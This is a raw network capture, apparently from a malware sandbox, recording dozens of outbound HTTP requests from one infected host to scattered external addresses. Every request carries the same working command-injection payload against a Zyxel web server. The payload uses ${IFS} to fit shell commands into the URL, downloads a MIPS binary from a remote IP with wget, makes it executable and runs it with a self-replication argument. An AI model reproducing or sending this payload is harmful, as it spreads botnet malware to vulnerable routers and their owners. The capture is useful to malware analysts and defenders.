                                                Jan 12, 2024 18:16:07.092236042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                487192.168.2.2344516190.45.219.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092262030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                488192.168.2.2335188208.29.43.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092302084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                489192.168.2.234722836.3.209.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092329979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                490192.168.2.235197673.71.50.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092381001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                491192.168.2.2356300222.226.72.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092403889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                492192.168.2.233879837.114.80.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092447042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                493192.168.2.2343366198.5.184.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092482090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                494192.168.2.234101618.89.53.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092515945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                495192.168.2.235311859.14.152.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092542887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                496192.168.2.234508457.19.206.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092573881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                497192.168.2.2336000212.14.46.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092614889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                498192.168.2.233334291.19.23.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092654943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                499192.168.2.2341720115.131.102.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092694998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                500192.168.2.233630442.135.75.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092720032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                501192.168.2.2347150140.203.102.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092752934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                502192.168.2.235633848.12.86.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092808008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                503192.168.2.2359454176.155.121.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092833996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                504192.168.2.2336756131.90.35.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092881918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                505192.168.2.2333798151.54.105.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092920065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                506192.168.2.2341112116.110.72.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092952967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                507192.168.2.2342656126.9.196.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092998981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                508192.168.2.2346380137.110.230.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093029976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                509192.168.2.234936241.178.124.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093072891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                510192.168.2.236016417.83.104.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093111038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                511192.168.2.2344264168.105.219.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093174934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                512192.168.2.2360866211.150.132.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093220949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                513192.168.2.2348622124.206.30.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093244076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                514192.168.2.2352934180.90.18.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093292952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                515192.168.2.235274085.108.183.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093311071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                516192.168.2.2355748157.127.45.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093350887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                517192.168.2.23582788.158.41.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093375921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                518192.168.2.2356414170.71.203.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093434095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                519192.168.2.2341064118.252.218.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093461990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                520192.168.2.2354648168.15.127.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093530893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                521192.168.2.2338812183.220.97.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093537092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                522192.168.2.233284020.53.245.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093580008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                523192.168.2.2354172129.79.248.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093615055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                524192.168.2.2342654165.216.23.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093646049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                525192.168.2.2335984106.202.75.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093705893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                526192.168.2.234605481.127.189.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093750954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                527192.168.2.2345594115.125.167.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093790054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                528192.168.2.235572664.109.93.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093827009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                529192.168.2.235162462.34.213.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093852043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                530192.168.2.2352698117.230.62.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093904018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                531192.168.2.2337244116.124.185.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093914986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                532192.168.2.234238425.230.218.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.093971014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                533192.168.2.2356864188.40.79.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094014883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                534192.168.2.2342578213.69.176.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094057083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                535192.168.2.234361692.39.216.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094085932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                536192.168.2.2336560133.196.118.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094135046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                537192.168.2.234180219.153.176.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094167948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                538192.168.2.233330479.216.1.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094212055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                539192.168.2.234042436.16.150.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094238997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                540192.168.2.2337414133.241.43.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094288111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                541192.168.2.233608893.186.189.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094321012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                542192.168.2.2333264195.179.70.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094367981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                543192.168.2.2350232210.160.151.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094402075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                544192.168.2.2354992174.156.38.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094422102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                545192.168.2.235054845.137.182.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094463110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                546192.168.2.233521631.20.152.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094501972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                547192.168.2.2360294144.237.82.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094551086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                548192.168.2.2360356115.185.117.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.094578981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                549192.168.2.2337870182.184.245.170443
                                                TimestampBytes transferredDirectionData
